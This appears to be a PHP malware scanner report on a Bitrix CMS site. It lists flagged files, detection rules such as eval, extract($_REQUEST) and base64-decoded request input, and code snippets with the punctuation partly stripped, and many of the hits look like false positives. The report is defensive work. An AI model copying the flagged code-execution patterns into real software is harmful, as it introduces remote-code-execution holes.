include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($l); } if ($DBName && !preg_match('#^\*+$#'$DBName)) { $strWarning .= '<li>'.getMsg('DBCONN_WARN'); $create_db false; } else { $DBHost 'localhost'.(file_exists($_SERVER['DOCUMENT_ROOT'].'/../BitrixEnv.exe') ? ':31006' ''); $DBLogin 'root'$DBPassword ''$DBName 'bitrix_'.(rand(11,99)); $create_db "Y"; } } else { $DBHost $_REQUEST["DBHost"]; $DBLogin $_REQUEST["DBLogin"]; $DBPassword $_REQUEST["DBPassword"]; $DBName $_REQUEST["DBName"]; $create_db $_REQUEST["creat...

Sign 7830f7a6 Line: 1755 Dangerous

Malware Signature (hash: 7830f7a6)

NvcH

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/update_system_market.php

Size: 29.34 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 88 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/update_system_market_notru.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist_report.php

Size: 18.84 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 25 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")

Function eval Line: 305 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=$arStates;?>);
        var Dialog = false;
        var current = 0;
        var next = 0;
        var prev = 0;
        var last_id = false;
        function InitState()
        {
            var el = false;
            for (var i=0;i<arStates["SECTIONS"].length;i++)
            {
                el = arStates["SECTIONS"][i];
                if (el.CHECKED == "Y")
                    BX.addClass(BX(el.ID+"_name"),"checklist-testlist-green");
                BX(el.ID+"_stat").innerHTML = "(<span class=\"checklist-testlist-passed-test\">"+el.CHECK+"</span>/"+el.TOTAL+")";
            }
            for (i=0;i<arStates["POINTS...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/main_controller.php

Size: 8.74 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($oRequest->arParameters['join_command']); $oResponse->status "200 OK"; } else { $oResponse->status "472 Bad Request"$oResponse->text GetMessage("MAIN_ADM_CONTROLLER_ERR8"); } } elseif(!$oRequest->Check()) { $oResponse->status "403 Access Denied"$oResponse->text "Access Denied"; } else { switch($oRequest->operation) { case "ping"$oResponse->status "200 OK"; break; case "register"$ticket_id COption::GetOptionString("main""controller_ticket"""); list($ticket_created, ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/message_admin.php

Size: 13.39 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 66 Warning

Double var technique is usually used for the obfuscation of malicious code

${$f}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/dump.php

Size: 46.38 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(result))
            
counter_sec regs[1];
    }
}

function 
IncCounter()
{
    
window.setTimeout(IncCounter1000);
    if (!
counter_started)
        return;

    
counter_sec ++;
    var 
ob;
    if (
ob BX('counter_field'))
    {
        var 
min Math.floor(counter_sec 60);
        var 
sec counter_sec 60;
        if (
min 10)
            
min '0' min;
        if (
sec 10)
            
sec '0' sec;
        
ob.innerHTML min ':' sec;
    }
}
window.setTimeout(IncCounter1000);

function 
GetLicenseInfo()
{
    
CHttpRequest.Action = function(result)
    {
        
BX('...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/partner_modules.php

Size: 18.52 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $stableVersionsOnly COption::GetOptionString("main""stable_versions_only""Y"); $arRequestedModules CUpdateClientPartner::GetRequestedModules(""); $arUpdateList CUpdateClientPartner::GetUpdatesList($errorMessageLANG$stableVersionsOnly$arRequestedModules, Array("fullmoduleinfo" => "Y")); $strError_...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/menu.php

Size: 24.77 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["sort"] == $b["sort"]) return strcasecmp($a["text"], $b["text"]); return ($a["sort"] < $b["sort"])? -1 : 1;')); } } $settingsItems[] = array( "text" => GetMessage("MAIN_MENU_MODULE_SETTINGS"), "url" => "settings.php?lang=".LANGUAGE_ID"title" => GetMessage("MAIN_MENU_SETTINGS_ALT"), "dynamic"=>true"module_id"=>"main""items_id"=>"menu_module_settings""items"=>$aModuleItems, ); } if($USER->CanDoOperation('view_other_settings') || $USER->CanDoOperation('cache...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/php_command_line.php

Size: 10.83 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($query); ob_end_flush(); printf("<hr>".GetMessage("php_cmd_exec_time")." %0.6f"microtime(1) - $stime); } require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_js.php"); die(); } $APPLICATION->SetTitle(GetMessage("php_cmd_title")); CJSCore::Init(array('ls')); if( $_SERVER['REQUEST_METHOD'] == 'POST' && $_POST["ajax"] === "y" && (isset($_POST["add"]) || $remove) ) { CUtil::JSPostUnescape(); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_a...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/site_checker.php

Size: 35.03 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 242 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['global_test_vars'])

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(result);

                var 
oTable BX('fix_table');
                if (
oRow BX('in_progress'))
                {
                    
oCell oRow.cells[1];
                }
                else
                {
                    
oRow oTable.insertRow(-1);
                    
oCell oRow.insertCell(-1);
                    
oCell.style.width '40%';
                    
oCell.innerHTML strCurrentTestName;
                    
oCell oRow.insertCell(-1);
                }

                if (
strResult == '')
                {
                    
oRow.setAttribute('id''in_progress');
                    
oCell.innerHTML '<div class="sc_progress" style="width:' test_percent '%">' test_percent ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/userfield_edit.php

Size: 17.60 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(i);
            if (
&& r[1] > 0)
            {
                
addNewRow('list_table');
            }
        }

    });

});
//-->
</script>
<form method="POST" Action="<?echo $APPLICATION->GetCurPage()."?lang=".urlencode(LANG)?>" ENCTYPE="multipart/form-data" name="post_form">
<? $tabControl->Begin(); ?>
<? $tabControl
->BeginNextTab(); ?>
    <?if($ID):?>
    <tr>
        <td width="40%">ID:</td>
        <td width="60%"><?=$ID?></td>
    </tr>
    <?endif?>
    <tr class="adm-detail-required-field">
        <td width="40%"><?=GetMessage("USERTYPE_USER_TYPE_ID")?>:</...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/group_edit.php

Size: 28.92 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("document.form1.USER_ID_FROM_" id);
                var 
ed1 = eval("document.form1.USER_ID_TO_" id);
                
ed.disabled = !obj.checked;
                
ed1.disabled = !obj.checked;
            }
            
</script>
            <? $ind = -1$dbUsers CUser::GetList(($b="id"), ($o="asc"), array("ACTIVE" => "Y")); while ($arUsers $dbUsers->Fetch()) { $ind++; ?>
                <tr>
                    <td>
                        <input type="hidden" name="USER_ID_<?=$ind?>" value="<?=$arUsers["ID"?>">
                        <input type="checkbox" name="USER_ID_ACT_<?=$ind?>" id="USER_ID_ACT_ID_...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/dump_list.php

Size: 15.63 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(result);
            
PartDownload();
        }
        
CHttpRequest.Send(url);
    }

    function 
PartDownload()
    {
        if (!
links || links.length == 0)
            return;

        var 
link links.pop();
        var 
iframe document.createElement('iframe');
        
iframe.style.display "none";
        
iframe.src link;
        
document.body.appendChild(iframe);

        
window.setTimeout(PartDownload10000);
    }

    function 
EndDump()
    {
    }
</script>
<div id="dump_result_div"></div>
<? $lAdmin->DisplayList(); echo BeginNote(); echo GetMessage("MAIN_DUMP_HEAD...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/tools/upload.php

Size: 984.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

exec($_REQUEST["mode"], array("width" => $_REQUEST["width"], "height" => $_REQUEST["height"])

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/tools.php

Size: 166.27 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Line: 3342 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp"Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")

Exploit execution Line: 3742 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ua) != null)
                        {
                            
rv parseFloat(RegExp.$1);
                        }
                    }
                    else if (
n.appName == "Netscape")
                    {
                        
rv 11;
                        
re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
                        if (
re.exec(ua) != null)
                        {
                            
rv parseFloat(RegExp.$1);
                        }
                    }
                }

                return 
rv;
            }

        })(
windowdocumentnavigator);
JS;
return 
'<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n""\t"), ""$js)."</script>"; } public static function GetScrip...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/bitrix/index.php

Size: 83.00 B Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign 0f37c730 Line: 2 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/bitrix/coupon_activation.php

Size: 16.58 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 148 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.post.form/templates/.default/template.php

Size: 16.90 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:53 Dangers: 3
DescriptionMatch

Exploit execution Line: 117 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 14 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/file.php")

Exploit execution Line: 15 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/urlpreview.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.map/component.php

Size: 5.85 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 157 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } $search_child false$search_path ''$full_path ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) { $full_path $aMenu[1]; } else { $full_path trim(Rel2Abs(substr($PARENT_PATHstrlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos strrpos($full_path"/"); if ($slash_pos !== false) { $page substr($full_path$slash_pos+1); if(($pos strpos($page'?')) !== false$page substr($page,...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.interface.grid/component.php

Size: 9.39 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions$arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface""global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> ''$arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == ''$arResult["OPTIONS"...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.ui.grid/templates/.default/template.php

Size: 31.21 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:53 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
        var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
        var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
        var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);

        Grid = Grid ? Grid.instance : null;

        if (Grid)
        {
            Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
            Grid.arParams.MESSAGES = messages;

            if (action !== 'more')
            {
                Grid.arParams.EDITABLE_DATA ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.user.link/component.php

Size: 19.17 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 440 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$folderPath."/card.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/utils.php

Size: 28.74 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 547 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$wizardPath."/.description.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/wizard.php

Size: 131.83 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 5
DescriptionMatch

Exploit download_remote_code2 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($handler'<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")

Exploit download_remote_code2 Line: 3971 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($handler,
            
'<'.'?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")

Exploit execution Line: 226 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')

Exploit execution Line: 2743 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbconn.php")

Exploit execution Line: 44 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcasecmp($a, $b);')); array_unshift($arModules"main"); return $arModules; } function GetNextStep($currentStep$currentStepStage$stepSuccess) { $stepIndex array_search($currentStep$this->arSteps); if ($currentStepStage == "utf8") { $nextStep $currentStep$nextStepStage "database"; } elseif ($currentStepStage == "database" && $stepSuccess) { $nextStep $currentStep$nextStepStage "files"; } else { if (!isset($this->arSteps[$stepIndex+1])) retur...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/template.php

Size: 9.12 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 42 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard_sol/utils.php

Size: 13.62 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 2 Dangers: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a["SORT"], $b["SORT"]);')); return $arWizardTemplates; } function GetTemplatesPath($path) { $templatesPath $path."/templates"; if (file_exists($_SERVER["DOCUMENT_ROOT"].$templatesPath."/".LANGUAGE_ID)) $templatesPath .= "/".LANGUAGE_ID; return $templatesPath; } function GetServices($wizardPath$serviceFolder ""$arFilter = Array()) { $arServices = Array(); $wizardPath rtrim($wizardPath"/"); $serviceFolder rtrim($serviceFolder"/"); if (LANGU...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("?>".file_get_contents($documentRoot.$pathDir."/.access.php")); } if (!isset($PERM[$pathFile]) || !is_array($PERM[$pathFile])) $arPermisson $permissions; else $arPermisson $permissions $PERM[$pathFile]; return $GLOBALS["APPLICATION"]->SetFileAccessPermission($originalPath$arPermisson); } function AddMenuItem($menuFile$menuItem$siteID$pos = -1) { if (CModule::IncludeModule('fileman')) { $arResult CFileMan::GetMenuArray($_SERVER["DOCUMENT_ROOT"].$menuFile); $arMenuItems $arR...

Sign 11413268 Line: 313 Dangerous

Malware Signature (hash: 11413268)

eval("?>

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard_sol/template.php

Size: 9.27 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/index.php

Size: 98.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.parameters.php

Size: 102.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.description.php

Size: 142.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/admin_security/index.php

Size: 4.50 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/index.php

Size: 99.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.parameters.php

Size: 103.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.description.php

Size: 143.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/admin_info/index.php

Size: 2.18 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit execution Line: 6 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/profile.php

Size: 29.00 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 7 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_POSTEXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/map/default.php

Size: 13.58 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Warns: 1 Dangers: 6
DescriptionMatch

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH..trim($cmenu)

Exploit execution Line: 203 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$child_menu)

Exploit execution Line: 209 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH.".".trim($cmenu)

Exploit execution Line: 341 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$main_menu)

Exploit extract_global Line: 14 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

Exploit silenced_eval Line: 220 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("return ".$CONDITION.";")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } if (strlen($aMenu[1])>0) { $search_child true; if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) $full_path $aMenu[1]; else $full_path trim(Rel2Abs($PARENT_PATH$aMenu[1])); } else { $search_child false$full_path $PARENT_PATH; } if (strlen($full_path)>0) { $FILE_ACCESS = (preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$full_path)) ? "R" $APPLICATION->GetFileAccessPermission($full_path); if ($FILE_ACCESS!="D" ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/change_password.php

Size: 3.49 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/forgot_password.php

Size: 2.54 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/registration.php

Size: 6.25 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
DescriptionMatch

Exploit extract_global Line: 2 Dangerous

Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request

extract($_REQUESTEXTR_SKIP)

